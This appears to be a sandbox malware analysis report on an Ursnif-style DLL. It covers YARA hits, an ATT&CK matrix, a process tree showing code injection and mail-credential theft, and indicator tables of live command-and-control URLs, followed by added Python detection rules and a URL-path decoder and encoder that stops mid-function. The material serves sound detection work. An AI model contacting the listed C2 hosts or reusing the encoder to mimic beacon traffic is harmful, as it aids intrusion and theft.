                      Source: Yara matchFile source: 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822118999.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883968959.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822095380.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883922056.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822210258.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.825513786.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.822798516.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976255392.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820157511.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.979102398.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976439736.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.969571267.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6856, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1848, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4868, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6508, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 1260, type: MEMORYSTR
                      Source: Yara matchFile source: 0.3.loaddll32.exe.3978d40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5488d40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5488d40.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53da4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53da4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.54594a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.38ca4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.39494a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.38ca4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.1184353403.000001B4FABB1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.973903195.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1056728839.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.971901239.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.977715932.000002D2D67C1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.915124168.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.960999590.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831743156.0000000005459000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1186234366.0000027D4F801000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.1182359593.000001DA4C261000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1013485765.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.985513376.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825194509.00000000038CA000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1018879466.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.960496675.0000000006AD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1049623811.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.977139805.0000000000921000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.976843830.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.952939817.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831611672.00000000053DA000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.975140453.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1024534203.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.911103239.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.970866897.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.950497075.000000000515F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.1028966230.0000029E58B09000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1045657858.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825244038.0000000003949000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1182006594.000000000364F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.3.loaddll32.exe.10d8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.dd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.5d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30a94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4f694a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.db8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.49594a0.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.ef8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30a94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.49594a0.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5a8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e4b0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.d88cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4a70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4f694a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.928533475.0000000004959000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1181853805.00000000030A9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.797262385.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.776223175.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.798115453.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.833489958.0000000004F69000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.786707655.0000000000D80000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

(Cells are separated by "|". Trailing digits on a technique name are the superscript counters from the original matrix; empty cells are empty in the original.)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts1 | Windows Management Instrumentation2 | DLL Side-Loading1 | DLL Side-Loading1 | Obfuscated Files or Information1 | Credential API Hooking3 | System Time Discovery1 | Remote Services | Archive Collected Data11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact1
Default Accounts | Native API1 | Valid Accounts1 | Valid Accounts1 | DLL Side-Loading1 | LSASS Memory | Account Discovery1 | Remote Desktop Protocol | Email Collection11 | Exfiltration Over Bluetooth | Encrypted Channel2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Command and Scripting Interpreter1 | Logon Script (Windows) | Access Token Manipulation1 | Rootkit4 | Security Account Manager | File and Directory Discovery3 | SMB/Windows Admin Shares | Credential API Hooking3 | Automated Exfiltration | Non-Application Layer Protocol4 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | PowerShell1 | Logon Script (Mac) | Process Injection913 | Masquerading1 | NTDS | System Information Discovery46 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol14 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Valid Accounts1 | LSA Secrets | Query Registry1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Access Token Manipulation1 | Cached Domain Credentials | Security Software Discovery11 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion21 | DCSync | Virtualization/Sandbox Evasion21 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection913 | Proc Filesystem | Process Discovery3 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Rundll321 | /etc/passwd and /etc/shadow | Application Window Discovery1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | System Owner/User Discovery1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | Remote System Discovery1 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | System Network Configuration Discovery2 | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | | | Inhibit System Recovery

Behavior Graph

Behavior Graph ID: 498359, Sample: data.dll, Start date: 07/10/2021, Architecture: WINDOWS, Score: 100

Signatures attached to the start node: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 13 other signatures.

Process tree and per-node findings, reconstructed from the graph text (numbers in brackets are the graph's own node IDs, not PIDs; "injected" marks processes the graph shows as injected into rather than started):

[2] Start: data.dll
  [9] mshta.exe: Suspicious powershell command line found
    [17] powershell.exe: drops C:\Users\user\AppData\...\a52acufz.cmdline (UTF-8); Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); Compiles code for process injection (via .Net compiler)
      [31] explorer.exe (injected): contacts art.microsoftsofymicrosoftsoft.at; System process connects to network (likely due to code injection or exploit); Tries to steal Mail credentials (via file access); Changes memory attributes in foreign processes to executable or writable; 3 other signatures
        [52] cmd.exe: Uses nslookup.exe to query domains
          [71] nslookup.exe: queries 222.222.67.208.in-addr.arpa, resolver1.opendns.com, myip.opendns.com; May check the online IP address of the machine
          [75] conhost.exe
        [55] cmd.exe
          [77] conhost.exe
        [57] RuntimeBroker.exe (injected)
        [69] 3 other processes
      [35] csc.exe: drops C:\Users\user\AppData\Local\...\a52acufz.dll (PE32)
        [59] cvtres.exe
      [38] csc.exe: drops C:\Users\user\AppData\Local\...\ddwuzigh.dll (PE32)
        [61] cvtres.exe
      [40] conhost.exe
  [12] loaddll32.exe: contacts art.microsoftsofymicrosoftsoft.at (194.147.86.221, source ports 49776, 49777, 49778; NETRACK-ASRU, Russian Federation) and init.icecreambob.com; Writes to foreign memory regions; Writes or reads registry keys via WMI; Writes registry values via WMI
    [21] cmd.exe
      [42] rundll32.exe: contacts init.icecreambob.com; Writes to foreign memory regions; Allocates memory in foreign processes; Modifies the context of a thread in another process (thread injection)
        [63] control.exe: Changes memory attributes in foreign processes to executable or writable; Writes to foreign memory regions; Allocates memory in foreign processes; 3 other signatures
          [79] rundll32.exe
    [23] rundll32.exe: System process connects to network (likely due to code injection or exploit); Writes registry values via WMI
    [25] control.exe
      [44] rundll32.exe
    [29] 2 other processes
  [15] mshta.exe
    [27] powershell.exe: drops C:\Users\user\AppData\Local\...\keehvxm3.0.cs (UTF-8); Maps a DLL or memory area into another process; Creates a thread in another existing process (thread injection)
      [46] csc.exe: drops C:\Users\user\AppData\Local\...\aixojixg.dll (PE32)
        [65] cvtres.exe
      [48] csc.exe: drops C:\Users\user\AppData\Local\...\keehvxm3.dll (PE32)
        [67] cvtres.exe
      [50] conhost.exe

Domain node art.microsoftsofymicrosoftsoft.at (reached from the injected explorer.exe): May check the online IP address of the machine
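The execution chain in the behavior graph above (mshta.exe spawning powershell.exe, powershell.exe driving csc.exe with a source file under AppData, and the injected explorer.exe running cmd.exe and nslookup.exe against myip.opendns.com) is the part of this report that maps most directly onto endpoint detections, and three of the report's own Sigma/signature names describe exactly those edges. The Python below is an added example, not part of the Joe Sandbox report or its signature engine: it evaluates four such rules over a constructed list of process-creation records that mirror the graph (PIDs reuse the graph's node numbers and are not real PIDs; paths and command lines are invented, and a few benign records are included to show what must not fire). It also walks the parent chain so that an alert carries the full ancestry rather than a single parent/child pair.

```python
"""Process-tree detections for the chain in the behavior graph above.

Added example, not part of the Joe Sandbox report or its signature engine. The
event list is constructed to mirror the graph: PIDs reuse the graph's node
numbers (not real PIDs), command lines and paths are invented, and a few benign
records are included to show what the rules must not flag.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon event 1 / Security 4688 shape)."""
    pid: int
    ppid: int
    image: str      # full image path as logged
    cmdline: str    # full command line as logged


# Script hosts and shells that mshta.exe has no legitimate reason to launch.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
# Add-Type style compiles point csc.exe at a .cmdline response file under the user's profile.
CSC_IN_APPDATA = re.compile(r"\\AppData\\.*\.cmdline", re.IGNORECASE)


def basename(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(pid: int, by_pid: Dict[int, ProcEvent], limit: int = 16) -> List[str]:
    """Image names from pid up to the root; stops at unknown parents, cycles, or limit."""
    chain: List[str] = []
    seen = set()
    while pid in by_pid and pid not in seen and len(chain) < limit:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


def detect(events: List[ProcEvent]) -> List[Tuple[str, int, str]]:
    """Return (rule, pid, ancestry) for every record that matches a rule."""
    by_pid = {e.pid: e for e in events}
    alerts: List[Tuple[str, int, str]] = []
    for ev in events:
        name = basename(ev.image)
        parent = by_pid.get(ev.ppid)
        pname = basename(parent.image) if parent else ""
        chain = " <- ".join(ancestry(ev.pid, by_pid))
        # Sigma "MSHTA Spawning Windows Shell"
        if pname == "mshta.exe" and name in SHELLS:
            alerts.append(("mshta_spawns_shell", ev.pid, chain))
        # "Compiles code for process injection (via .Net compiler)": weak on its own,
        # since Add-Type does the same; meaningful together with the next rule.
        if pname == "powershell.exe" and name == "csc.exe":
            alerts.append(("powershell_spawns_csc", ev.pid, chain))
        # Sigma "Suspicious Csc.exe Source File Folder"
        if name == "csc.exe" and CSC_IN_APPDATA.search(ev.cmdline):
            alerts.append(("csc_source_in_appdata", ev.pid, chain))
        # "Uses nslookup.exe to query domains" / "May check the online IP address of the machine"
        if name == "nslookup.exe" and "myip.opendns.com" in ev.cmdline.lower():
            alerts.append(("nslookup_external_ip_check", ev.pid, chain))
    return alerts


SAMPLE_EVENTS: List[ProcEvent] = [  # constructed, see module docstring
    ProcEvent(2, 0, r"C:\Windows\explorer.exe", "explorer.exe"),
    # mshta -> powershell -> csc (+ conhost), as in graph nodes 9, 17, 35, 40
    ProcEvent(9, 2, r"C:\Windows\System32\mshta.exe", "mshta.exe"),
    ProcEvent(17, 9, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe -w hidden"),
    ProcEvent(35, 17, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
              r'csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dk2vqsi0\dk2vqsi0.cmdline"'),
    ProcEvent(40, 17, r"C:\Windows\System32\conhost.exe", "conhost.exe 0xffffffff -ForceV1"),
    # loaddll32 -> cmd -> rundll32 -> control -> rundll32, as in graph nodes 12, 21, 42, 63, 79
    ProcEvent(12, 2, r"C:\sandbox\loaddll32.exe", r'loaddll32.exe "C:\Users\user\Desktop\data.dll"'),
    ProcEvent(21, 12, r"C:\Windows\SysWOW64\cmd.exe", r'cmd.exe /C rundll32.exe "C:\Users\user\Desktop\data.dll",#1'),
    ProcEvent(42, 21, r"C:\Windows\SysWOW64\rundll32.exe", r'rundll32.exe "C:\Users\user\Desktop\data.dll",#1'),
    ProcEvent(63, 42, r"C:\Windows\System32\control.exe", "control.exe"),
    ProcEvent(79, 63, r"C:\Windows\System32\rundll32.exe", "rundll32.exe"),
    # injected explorer -> cmd -> nslookup, as in graph nodes 31, 52, 71
    ProcEvent(52, 2, r"C:\Windows\System32\cmd.exe", "cmd.exe /C nslookup myip.opendns.com resolver1.opendns.com"),
    ProcEvent(71, 52, r"C:\Windows\System32\nslookup.exe", "nslookup myip.opendns.com resolver1.opendns.com"),
    # benign records that must not fire
    ProcEvent(90, 2, r"C:\Windows\System32\cmd.exe", "cmd.exe /C nslookup example.com"),
    ProcEvent(91, 90, r"C:\Windows\System32\nslookup.exe", "nslookup example.com"),
    ProcEvent(94, 2, r"C:\Program Files\IDE\devenv.exe", "devenv.exe"),
    ProcEvent(95, 94, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
              r'csc.exe /noconfig @"C:\src\app\obj\build.cmdline"'),
]


if __name__ == "__main__":
    for rule, pid, chain in detect(SAMPLE_EVENTS):
        print(f"{rule:28} pid={pid:<3} {chain}")
```

The powershell.exe to csc.exe edge fires on every Add-Type compile, so on its own it is noise; it becomes useful only when the same csc.exe record also matches the AppData source-folder rule, which is the pairing the report labels "Compiles code for process injection (via .Net compiler)". The loaddll32/rundll32/control.exe chain is left without a rule on purpose: control.exe launching rundll32.exe is normal Control Panel behaviour and would be better covered by the memory-write signatures than by process lineage.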


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
data.dll | 7% | Virustotal |

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
3.2.rundll32.exe.5d0000.0.unpack | 100% | Avira | HEUR/AGEN.1108168
0.2.loaddll32.exe.dd0000.0.unpack | 100% | Avira | HEUR/AGEN.1108168
5.2.rundll32.exe.4a70000.0.unpack | 100% | Avira | HEUR/AGEN.1108168

Domains

Source | Detection | Scanner | Label
init.icecreambob.com | 3% | Virustotal |
art.microsoftsofymicrosoftsoft.at | 10% | Virustotal |
222.222.67.208.in-addr.arpa | 2% | Virustotal |

URLs

Source | Detection | Scanner | Label
http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9Imm | 100% | Avira URL Cloud | malware
http://ns.adobe.co/xa | 0% | Avira URL Cloud | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbgoHPm/PaJLAxVV/txoYRHBbj9M336C_2FP0F_2/FUuIUTfxn8/_2Fi1Q9Nh_2BYEyGG/g7XOKDVcckgo/6ifLOiy2t7I/1SoBj6Jybx3_2F/lN5De25izDb_2BsQi5Wix/BNFu2ADC3y17pVCQ/oz9_2B52JzEyRR4/O_2FqG0LC5012e1TXc/xR9rFY1G5/iapdd6603NTaeINQSp_2/BwLMzJ7w5SugcYmEG0J/qMt4_2FOPEov9_2Bo1MdfB/1y5TCsV89mnx3/ekW9ulBTE4wo3daXfFHw/KT | 100% | Avira URL Cloud | malware
http://ns.adobp/ | 0% | Avira URL Cloud | safe
http://constitution.org/usdeclar.txtC: | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmPr12_/2Bzh4tdV/KDpXfYGpjXykhg2xrNZQnLl/eQWxO9UJs6/yiNSkrLwUALCzuZwZ/kdGCEU3rIU9m/RGyuFMKeogE/z1UGBluOo2rYqx/Sf1vojdcef_2FoAlYSwrS/eWFw3oSweCgrgQTo/R3sh0ZaR7_2BXrU/KBuwJkO2cZWh9s5jos/PpUP1bcud/5c_2B9g4iz3DCS_2B4Cz/pQllr8YcQ_2FVn4H2Us/rP5gQf2cVzgDcEADA7kdUN/KefPCJRSUE50z/YwbIZJdHqw/X0ic | 100% | Avira URL Cloud | malware
http://https://file://USER.ID%lu.exe/upd | 0% | Avira URL Cloud | safe
http://init.icecreambob.com/lbK | 100% | Avira URL Cloud | malware
http://ns.adobe.cmg | 0% | Avira URL Cloud | safe
https://www.tiktok.com/legal/report/feedback | 0% | URL Reputation | safe
http://init.icecreambob.com/ | 100% | Avira URL Cloud | malware
http://constitution.org/usdeclar.txt | 0% | URL Reputation | safe
http://init.icecreambob.com/og7BnMlwe_2BBL3VbbSex/Z2wNM4qLt9ZGOnrN/9je8jFPaDsbcMzh/J_2BWsBwN0E9DyNOrX/d2qP1bGCk/qJX6O5QV7cikPdeCysOT/SVA8NuODHqgxyywc97o/sy0RL7jVfhXgOS_2F71qSG/2FS97AOq0AZ7i/X9_2BsM8/SJH1OhdjW9LhTsNZM3lXLoj/SkVBjHPOLQ/6GYRgOB9uQP3Kv3KV/fG6AntXu_2Fz/nGnOrkp86kX/RqEbx2FTMLsnk_/2FwjN_2B5_2BN0BKA_2FD/vDq8sU2vs2Ajys3z/1dncEwDhZBm_2B_/2BT0IVCl_2Fi1ROltK/Ns3vDVNy1/kniVonoTwHdN/F4BE_2B | 100% | Avira URL Cloud | malware
http://init.icecreambob.com/WD1GVGFxgZw/vdm2GeJ_2BleeD/xBKgH3gETrFFIsar7DerZ/qXw_2BmqCKfPdDFV/h8dkp6DT7p7lsEb/gtBepZBTsY8u6IZ_2B/slZYk8jOI/KWElWApc2AbPjj3JcqRW/pbQLCPSQWt3ZN3tjPe8/mXL41rn8MBcUk2OkcsuXJx/EoX5HyK9gu6tJ/HdiOJ_2F/vkfbE_2BFoaAHj2fO1r8paT/WkrWga9cjs/R1EobQ_2FVIB2FUG2/gDd0_2B_2Bn1/TZlCNHxakZo/w6E7c784GfHMDV/_2Fz5c89FcKDHFuQdUlIO/O21na4IIxgsQc_2B/zRGRLvdYbxEEQyb/llhWY2ulIai/ojLy | 100% | Avira URL Cloud | malware
https://contoso.com/ | 0% | URL Reputation | safe
http://art.microsoftsofymicrosoftsoft.at/F8KV2hZoxO/U2sbox634rP29bJ_2/FXULDRGEtFfT/UZYVIFvPXHK/8dhg8UXIv347p9/lAjhFuG3pLkJW9jPts5ig/H4HccXVK4_2Fj3x4/JNX_2FOInLR8Nhr/AvMOGKETT4xKlbvgKV/ywk72W2sF/XRIveNKW0cDr2x9FlGme/9PA3AGNAa4JFJCkP8Ol/kE52dtLr2Gc2GIIsbVvLY7/_2FgegwtK4luv/WlDWKBm_/2BVUH_2FoyHiVnOSkUYW3XN/ZNo_2FlFkO/0PpkXJxUPRqbyltz6/D1_2B17g8RMv/LKZDclZ4G3c/Yy5W17MUWWbx9b/ZWlGh_2BykFLR0SdMWzQw/4cxn7 | 0% | Avira URL Cloud | safe
http://ns.adobe.ux | 0% | Avira URL Cloud | safe
http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsb | 100% | Avira URL Cloud | malware
http://init.icecreambob.com/l | 100% | Avira URL Cloud | malware
http://ns.micro/1 | 0% | Avira URL Cloud | safe
http://init.icecreambob.com/2dRjaoZ5ba/_2B9OCZL2JKsW54Zw/b8_2FudlSzim/FebecF2Mr0l/RLhLAUL9EkrBQ6/jcfZJyjU6XRJEy_2F_2Fw/U4DTV9Ne0aXzpB9J/0iupMlpKOkgE91k/O1eWSmo3SiP86KIi_2/Fb913ObwC/qpNQAlO4bBFCqmydHOLy/nNarqOCZZOFGkIl4hzv/0jh_2Fn5oIgCb_2BiKYiQR/_2BU0c0XcTad1/VVgGQIES/_2B4c60XhwvhKtewqx0YhNF/9_2B9c5LC4/AStWPuhmAHWEYDBRQ/AKTTfZkbsU8X/VSsiQHsgzPR/ZrnjJVXfpIalCe/F_2BaXGFB0UzrQMjtIKjY/vg3Zv3Ys/i | 100% | Avira URL Cloud | malware
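The init.icecreambob.com and art.microsoftsofymicrosoftsoft.at URLs above all have the same shape: long paths cut into random-length segments that contain the tokens `_2B` and `_2F`, and in several of them a segment boundary falls inside a token (`..._2/FUuIUTfxn8...`, `...Pr12_/2Bzh4tdV...`). Public ISFB/Ursnif analyses describe this as base64 data whose non-URL-safe characters are replaced by tokens, with `/` then inserted at random positions; the page itself only shows the resulting URLs. The Python below is an added example, not from the report: it reverses that encoding, handles the split-token case, and round-trips constructed input. Assumptions not supported by this page: the `_2D` token for `=`, the statement that the decoded bytes are still the bot's cipher text (the per-sample key is not listed here), and the placeholder host `example.invalid`.

```python
"""Undo the Ursnif/ISFB URI path encoding and recover the carried bytes.

Added example, not from the Joe Sandbox report. The _2B/_2F tokens are visible in
the report's URLs; the _2D token for '=' is an assumption taken from public ISFB
analyses, and example.invalid is a placeholder host.
"""
import base64
import re
from typing import Iterable, List
from urllib.parse import urlsplit

TOKENS = {"_2B": "+", "_2F": "/", "_2D": "="}   # _2D is an assumption (see docstring)
B64_TEXT = re.compile(r"^[A-Za-z0-9+/]*={0,2}$")


def normalize_path(url: str) -> str:
    """Join the path segments before undoing the tokens: a '/' may have been inserted
    inside a token (the report shows '..._2/FUuIUTfxn8...'), so replacing first would miss it."""
    joined = urlsplit(url).path.replace("/", "")
    for token, char in TOKENS.items():
        joined = joined.replace(token, char)
    return joined


def decode_path(url: str) -> bytes:
    """Return the bytes carried in the path; raise ValueError if it is not base64 after
    normalization. The result is still the bot's cipher text (assumption: the per-sample
    key is not on this page), so this is the first step of analysis, not the last."""
    text = normalize_path(url).rstrip("=")
    text += "=" * (-len(text) % 4)          # re-pad in case '=' was dropped or tokenized differently
    if not B64_TEXT.match(text):
        raise ValueError("path is not ISFB-style base64 after normalization")
    return base64.b64decode(text, validate=True)


def encode_path(payload: bytes, segment_lengths: Iterable[int]) -> str:
    """Inverse of decode_path, for generating test traffic: base64, tokenize, then cut
    into segments of the given lengths (cycled), joined by '/'."""
    lengths = list(segment_lengths)
    if not lengths or min(lengths) < 1:
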